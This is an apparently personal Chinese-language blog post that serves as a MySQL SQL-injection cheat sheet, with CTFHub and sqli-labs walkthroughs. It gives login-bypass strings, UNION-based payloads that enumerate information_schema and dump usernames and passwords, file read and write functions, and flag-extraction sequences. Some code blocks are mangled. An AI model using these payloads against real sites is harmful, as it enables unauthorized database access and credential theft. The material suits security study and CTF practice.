<!DOCTYPE html>
<html lang="en">

<head>

  <!-- Minima -->
  <!-- Hexo theme created by @adisaktijrs -->

  <!-- Basic Page Needs
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <meta charset="utf-8">

  
  <title>SQL注入-基本查询及注入备忘</title>
  
  <link rel="canonical" href="https://noname0519.com/2022/01/20/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E6%9C%AC%E6%9F%A5%E8%AF%A2%E5%8F%8A%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98/">
  
  <meta name="description" content="SQL注入-基本查询及注入语句MYSQL数据库结构数据库–表–列–字段 MySQL常用函数读文件 1select load_file(&amp;#x27;path&amp;#x27;);  写文件 1select &amp;#x27;filename&amp;#x27; into outfile &amp;#x27;path&amp;#x27;;">
  
  
  <meta name="author" content="Noname">
  
  <meta property="og:image" content="https://noname0519.comundefined">
  
  <meta property="og:site_name" content="Noname&#39;s Homepage" />
  <meta property="og:type" content="article" />
  <meta property="og:title" content="SQL注入-基本查询及注入备忘" />
  
  <meta property="og:description" content="SQL注入-基本查询及注入语句MYSQL数据库结构数据库–表–列–字段 MySQL常用函数读文件 1select load_file(&amp;#x27;path&amp;#x27;);  写文件 1select &amp;#x27;filename&amp;#x27; into outfile &amp;#x27;path&amp;#x27;;">
  
  <meta property="og:url" content="https://noname0519.com/2022/01/20/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E6%9C%AC%E6%9F%A5%E8%AF%A2%E5%8F%8A%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98/" />

  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="SQL注入-基本查询及注入备忘">
  
  <meta name="twitter:description" content="SQL注入-基本查询及注入语句MYSQL数据库结构数据库–表–列–字段 MySQL常用函数读文件 1select load_file(&amp;#x27;path&amp;#x27;);  写文件 1select &amp;#x27;filename&amp;#x27; into outfile &amp;#x27;path&amp;#x27;;">
  
  
  <meta name="twitter:image" content="https://noname0519.comundefined">
  
  <meta name="twitter:url" content="https://noname0519.com/2022/01/20/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E6%9C%AC%E6%9F%A5%E8%AF%A2%E5%8F%8A%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98/" />

  <!-- Mobile Specific Metas
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- Preload fonts
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <link rel="preload" href="../fonts/dm-serif-display-v4-latin-regular.woff2" as="font" type="font/woff2" crossorigin>
  <link rel="preload" href="../fonts/inter-v2-latin-regular.woff2" as="font" type="font/woff2" crossorigin>

  <!-- CSS
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  
<link rel="stylesheet" href="/css/normalize.css">

  
<link rel="stylesheet" href="/css/skeleton.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
<link rel="stylesheet" href="/css/prism-dark.css">

  
<link rel="stylesheet" href="/css/prism-line-numbers.css">

  <!-- User css -->
  
  
<link rel="stylesheet" href="/css/user.css">

  

  <!-- Favicon
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <link rel="icon" type="image/png" href="/images/favicon.png">

  <!-- Custom Theme Color Style
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <style>
  a:not(.icon) {
    text-decoration-color: #0FA0CE;
    background-image: linear-gradient(
      to bottom,
      rgba(0, 0, 0, 0) 50%,
      #0FA0CE 50%
    );
  }
  blockquote {
    border-left: 8px solid #0FA0CE;
  }
  .nanobar .bar {
    background: #0FA0CE;
  }
  .button.button-primary:hover,
  button.button-primary:hover,
  input[type="submit"].button-primary:hover,
  input[type="reset"].button-primary:hover,
  input[type="button"].button-primary:hover,
  .button.button-primary:focus,
  button.button-primary:focus,
  input[type="submit"].button-primary:focus,
  input[type="reset"].button-primary:focus,
  input[type="button"].button-primary:focus {
    background-color: #0FA0CE;
    border-color: #0FA0CE;
  }
  input[type="email"]:focus,
  input[type="number"]:focus,
  input[type="search"]:focus,
  input[type="text"]:focus,
  input[type="tel"]:focus,
  input[type="url"]:focus,
  input[type="password"]:focus,
  textarea:focus,
  select:focus {
    border: 1px solid #0FA0CE;
  }
</style>

  <!-- Google Analytics (With Privacy Settings On)
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  

<meta name="generator" content="Hexo 6.0.0"></head>

<body>
  <div class="container">
    <div class="row">
      <div>

        <div class="row">
  <div class="two columns" style="max-width: 50px">
    <h1 class="mt-2 mode">
      <div onclick=setDarkMode(true) id="darkBtn">🌑</div>
      <div onclick=setDarkMode(false) id="lightBtn" class=hidden>☀️</div>
      <script >
        if (localStorage.getItem('preferredTheme') == 'dark') {
          setDarkMode(true)
        }
        function setDarkMode(isDark) {
          var darkBtn = document.getElementById('darkBtn')
          var lightBtn = document.getElementById('lightBtn')
          if (isDark) {
            lightBtn.style.display = "block"
            darkBtn.style.display = "none"
            localStorage.setItem('preferredTheme', 'dark');
          } else {
            lightBtn.style.display = "none"
            darkBtn.style.display = "block"
            localStorage.removeItem('preferredTheme');
          }
          document.body.classList.toggle("darkmode");
        }
      </script>
    </h1>
  </div>

  <div class="six columns ml-1">
    <h1 class="mt-2">
      Noname&#39;s Homepage.
    </h1>
  </div>

  <div class="twelve columns">
    <div class="row">
      <div class="nine columns left">
        <a href="/">Home</a>
        
          
          <a href="/works" class="ml">Works</a>
          
        
          
          <a href="/links" class="ml">Link</a>
          
        
          
          <a href="/about" class="ml">About</a>
          
        
        
          
            <a href="mailto:noname0519@outlook.com" target="_blank" class="ml">Email</a>
          
        
      </div>
    </div>
    <hr style="margin-bottom: 2.6rem">
  </div>
</div>

        <div class="trans">
            <h2>SQL注入-基本查询及注入备忘</h2>

  <h1 id="SQL注入-基本查询及注入语句"><a href="#SQL注入-基本查询及注入语句" class="headerlink" title="SQL注入-基本查询及注入语句"></a>SQL注入-基本查询及注入语句</h1><h2 id="MYSQL数据库结构"><a href="#MYSQL数据库结构" class="headerlink" title="MYSQL数据库结构"></a>MYSQL数据库结构</h2><p>数据库–表–列–字段</p>
<h2 id="MySQL常用函数"><a href="#MySQL常用函数" class="headerlink" title="MySQL常用函数"></a>MySQL常用函数</h2><p>读文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> load_file(<span class="string">&#x27;path&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>写文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="string">&#x27;filename&#x27;</span> <span class="keyword">into</span> outfile <span class="string">&#x27;path&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p><strong>ASCII()&#x2F;ORD()</strong> 返回字符串的ascii码值</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> ord(); <span class="comment">-- 返回第一个ascii码值</span></span><br></pre></td></tr></table></figure>

<p><strong>MID()&#x2F;SUBSTR()</strong> 返回一个字符串的一部分</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> mid(<span class="string">&#x27;mysql&#x27;</span>,<span class="number">1</span>,<span class="number">2</span>); <span class="comment">-- my</span></span><br><span class="line"><span class="keyword">select</span> mid(<span class="string">&#x27;mysql&#x27;</span>, <span class="number">2</span>,<span class="number">2</span>); <span class="comment">--- ys</span></span><br><span class="line"><span class="keyword">select</span> substr(<span class="string">&#x27;mysql&#x27;</span>,<span class="number">1</span>,<span class="number">2</span>); <span class="comment">-- my</span></span><br></pre></td></tr></table></figure>

<p><strong>LEFT()</strong> 返回字符串最左边的几个字符</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">left</span>(<span class="string">&#x27;mysql&#x27;</span>, <span class="number">2</span>);</span><br></pre></td></tr></table></figure>

<p><strong>SLEEP()</strong> 让此语句运行N秒钟</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> sleep(N);</span><br><span class="line"><span class="keyword">select</span> if(<span class="number">1</span><span class="operator">&gt;</span><span class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>); <span class="comment">-- 3 若第一个参数为真，则返回第一个参数，否则第二个</span></span><br></pre></td></tr></table></figure>

<p><strong>STRCMP()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> strcmp(<span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>); # <span class="number">-1</span></span><br><span class="line"><span class="keyword">select</span> strcmp(<span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;a&#x27;</span>); # <span class="number">0</span></span><br><span class="line"><span class="keyword">select</span> strcmp(<span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;b&#x27;</span>); # <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><strong>IFNULL()</strong> 假如参数1不为null，则返回值为参数1，否则返回值为参数2</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> ifnull(<span class="number">1</span><span class="operator">/</span><span class="number">0</span>, <span class="number">2</span>); <span class="comment">--2.0000</span></span><br></pre></td></tr></table></figure>

<p><strong>exp()</strong> 返回e的x次方</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="built_in">exp</span>(<span class="number">1</span>); <span class="comment">--2.71828</span></span><br></pre></td></tr></table></figure>

<h2 id="SQL基本语句"><a href="#SQL基本语句" class="headerlink" title="SQL基本语句"></a>SQL基本语句</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">show</span> databases; #显示所有数据库</span><br><span class="line">use 数据库名字; #使用数据库</span><br><span class="line"><span class="keyword">show</span> tables; #显示所有表单</span><br></pre></td></tr></table></figure>

<p>SELECT 列名称 FROM 表名称 WHERE 条件 #从表中选取数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span><span class="operator">*</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> name <span class="operator">=</span> <span class="string">&#x27;xxx&#x27;</span>;  #<span class="operator">*</span>表示所有列</span><br></pre></td></tr></table></figure>

<p>UPDATE 表名称 SET 列名称 &#x3D; 新值 WHERE 条件 #修改表中某只 ex:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> 表名称(字段名称) <span class="keyword">values</span> (值<span class="number">1</span>, 值<span class="number">2</span>)</span><br><span class="line"><span class="keyword">delete</span> <span class="keyword">from</span> (表) <span class="keyword">where</span> 条件</span><br></pre></td></tr></table></figure>

<p>union select 联合查询</p>
<p>UNION操作符用于合并两个或多个SELECT语句的结果集（UNION内部的每个SELECT语句必须拥有相同数量的列，列也必须拥有相似的数据类型，同时每个SELECT语句中的列的顺序必须相同）</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> column_name(s) <span class="keyword">FROM</span> table_name1</span><br><span class="line"><span class="keyword">UNION</span></span><br><span class="line"><span class="keyword">SELECT</span> column_name(s) <span class="keyword">FROM</span> table_name2</span><br></pre></td></tr></table></figure>

<h2 id="万能密码备忘"><a href="#万能密码备忘" class="headerlink" title="万能密码备忘"></a>万能密码备忘</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; or &#x27;</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> #</span><br><span class="line"><span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="comment">--</span></span><br></pre></td></tr></table></figure>

<p>分析万能密码如何被解析 通过闭合引号以及注释后面的内容</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> username <span class="string">&#x27;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="keyword">or</span> <span class="string">&#x27;1&#x27;</span> <span class="operator">=</span> <span class="string">&#x27;1&#x27;</span> # 输入的内容</span><br><span class="line"><span class="string">&#x27; and pwd= &#x27;</span></span><br><span class="line"><span class="string">&#x27;or &#x27;</span><span class="number">1</span><span class="string">&#x27;=&#x27;</span><span class="number">1</span> # 输入的内容</span><br><span class="line"><span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="查询数据核心语法"><a href="#查询数据核心语法" class="headerlink" title="查询数据核心语法"></a>查询数据核心语法</h2><p>获取当前数据库用户、名称、版本信息</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">user</span>(), database(), version <span class="keyword">from</span> dual;</span><br></pre></td></tr></table></figure>

<p><strong>查库</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata</span><br></pre></td></tr></table></figure>

<p><strong>查表</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>库名</span><br><span class="line"># 方法<span class="number">1</span></span><br><span class="line"><span class="keyword">select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database();</span><br><span class="line"># 方法<span class="number">2</span></span><br><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;database_name&#x27;</span>;</span><br><span class="line"># 方法<span class="number">3</span></span><br><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>(<span class="keyword">select</span> database());</span><br></pre></td></tr></table></figure>

<p><strong>查列</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="string">&#x27;表名&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p><strong>查数据</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 列名 <span class="keyword">from</span> 库名.表名</span><br></pre></td></tr></table></figure>

<p>若数据太多导致无法返回查询结果</p>
<p>查询：可以用limit限定返回的数量和位置回显</p>
<p>若页面只能回显一条数据，可以使用concat 语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata;</span><br></pre></td></tr></table></figure>

<p>爆库的过程中可以使用 concat_ws 使得数据更清晰(加入-作为分隔符)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>(<span class="keyword">select</span> concat_ws(<span class="string">&#x27;-&#x27;</span>,username,password) <span class="keyword">from</span> security.users limit <span class="number">0</span>, <span class="number">1</span>) <span class="comment">--+)</span></span><br></pre></td></tr></table></figure>

<h3 id="UNION注入"><a href="#UNION注入" class="headerlink" title="UNION注入"></a>UNION注入</h3><p>union操作符用于合并两个及以上的多个SELECT语句的结果集 注意：UNION内部的SELECT语句必须拥有相同数量的列，列要拥有相似的数据类型，且每条SELECT语句的列的顺序必须相同，默认是选取不同的值，若允许重复的值需要使用UNION ALL</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> column_name(s) <span class="keyword">FROM</span> table_name1</span><br><span class="line"><span class="keyword">UNION</span></span><br><span class="line"><span class="keyword">SELECT</span> column_name(s) <span class="keyword">FROM</span> table_name2</span><br></pre></td></tr></table></figure>

<p><strong>注意：</strong> 1.<strong>只有最后有个SELECT语句允许有ORDER BY</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">order</span> <span class="keyword">by</span> id <span class="keyword">union</span> selet <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>; <span class="comment">-- 错误</span></span><br></pre></td></tr></table></figure>

<p>2.<strong>只有最后有个SELECT子句允许有LIMIT</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users limit <span class="number">0</span>,<span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>; <span class="comment">-- 错误</span></span><br><span class="line">```se</span><br><span class="line"><span class="number">3.</span><span class="operator">*</span><span class="operator">*</span>只要<span class="keyword">UNION</span>连接的几个查询的字段数一样且列的数据类型转换没有问题即可查询出结果<span class="operator">*</span><span class="operator">*</span></span><br><span class="line"><span class="number">4.</span><span class="operator">*</span><span class="operator">*</span>注入点页面要有回显<span class="operator">*</span><span class="operator">*</span></span><br><span class="line"></span><br><span class="line">#### 注意流程</span><br><span class="line"><span class="number">1.</span><span class="keyword">ORDER</span> <span class="keyword">BY</span> 确定列数 二分法快速判断</span><br><span class="line"><span class="number">2.</span>观察页面返回，选取可以显示数据的位置，继续注入</span><br><span class="line"><span class="number">3.</span>读库信息</span><br><span class="line"><span class="number">4.</span>读表信息</span><br><span class="line"><span class="number">5.</span>读字段</span><br><span class="line"><span class="number">6.</span>读数据</span><br><span class="line"></span><br><span class="line">详细试水案例</span><br><span class="line">Less<span class="number">-1</span></span><br><span class="line">```<span class="keyword">sql</span></span><br><span class="line"><span class="number">1</span>` <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">3</span> <span class="comment">--+</span></span><br><span class="line"><span class="number">1</span><span class="string">&#x27; order by 4 --+</span></span><br></pre></td></tr></table></figure>

<p>所以利用报错信息，得到列数为3</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="string">&#x27; union select 1,2,3 --+</span></span><br></pre></td></tr></table></figure>

<p>理解：原本表中有3列，id name password union select 1,2,3对应了3列，所以数字2和3出现在了name和password的位置 所以可以利用这两列的位置进行注入和回显信息</p>
<p>sql语句分析：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br></pre></td></tr></table></figure>

<p><strong>爆表名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 方式1 一条一条爆</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">3</span>;</span><br><span class="line"><span class="comment">-- 方式2 拼接的方式爆出所有表</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat( schema_name) <span class="keyword">from</span> information_schema.schemata),<span class="number">3</span>;</span><br></pre></td></tr></table></figure>



<p>注入语句：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; union select 1,2,(select schema_name from information_schema.schemata limit 4,1)--+</span></span><br><span class="line"><span class="string">&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(<span class="keyword">select</span> group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata) <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>emmm显然应该(或许大概)是这张security库啦 <strong>读表信息</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(<span class="keyword">select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;security&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>注入语句：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;security&#x27;</span></span><br><span class="line"><span class="string">&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27; --+</span></span><br></pre></td></tr></table></figure>

<p>要读取账户密码，所以选择users表</p>
<p><strong>读段信息</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,(<span class="keyword">select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="string">&#x27;users&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>注入语句：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;</span>users<span class="string">&#x27;--+</span></span><br></pre></td></tr></table></figure>

<p>直接读取username和password就可以</p>
<p><strong>读数据</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">` <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,concat_ws(<span class="string">&#x27;;&#x27;</span>,username,password) <span class="keyword">from</span> users limit <span class="number">0</span>,<span class="number">1</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>注：可以使用库名的十六进制代替 database() 当前表</p>
<p>补充一些内容： 字段数判断 SELECT * FROM users limit 1,1 into @,@,@</p>
<p>concat函数在连接字符串时，只要其中一个是null，将返回null</p>
<p>concat_ws则会返回不为null的部分</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> concat(<span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="keyword">null</span>)</span><br><span class="line"><span class="keyword">select</span> concat_ws(<span class="string">&#x27;,&#x27;</span>, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;2&#x27;</span>,<span class="keyword">null</span>)</span><br></pre></td></tr></table></figure>

<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="CTFHub-Sql注入"><a href="#CTFHub-Sql注入" class="headerlink" title="CTFHub-Sql注入"></a>CTFHub-Sql注入</h3><h4 id="整数型注入"><a href="#整数型注入" class="headerlink" title="整数型注入"></a>整数型注入</h4><p>payload：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> 回显正常</span><br><span class="line"><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> 无回显</span><br><span class="line"></span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,database() # 回显当前库名是sqli</span><br><span class="line"></span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>, group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;sqli&#x27;</span> #爆出表名 news, flag</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>, group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="string">&#x27;flag&#x27;</span> #爆出列名flag</span><br><span class="line"></span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>, group_concat(flag) <span class="keyword">from</span> sqli.flag #爆flag</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h4 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h4><figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>&#x27;</span><br></pre></td></tr></table></figure>
<p>回显：<br>select * from news where id&#x3D;’1’’<br>。。。<br>payload:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; order by 2# 回显正常，得2列</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">-1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,database()# 得库名sqli</span><br><span class="line"></span><br><span class="line"><span class="number">-1</span><span class="string">&#x27; union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#x27;</span>sqli<span class="string">&#x27;# 得表名 news flag</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">-1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;sqli&#x27;</span># 得列名id,data,flag</span><br><span class="line"></span><br><span class="line"><span class="number">-1</span><span class="string">&#x27; union select 1, group_concat(flag) from sqli.flag # 得flag</span></span><br></pre></td></tr></table></figure>
  <p> — Jan 20, 2022</p>
  


          <div class="row mt-2">
  
    <div class="eight columns">
      <p id="madewith">Made with ❤ and
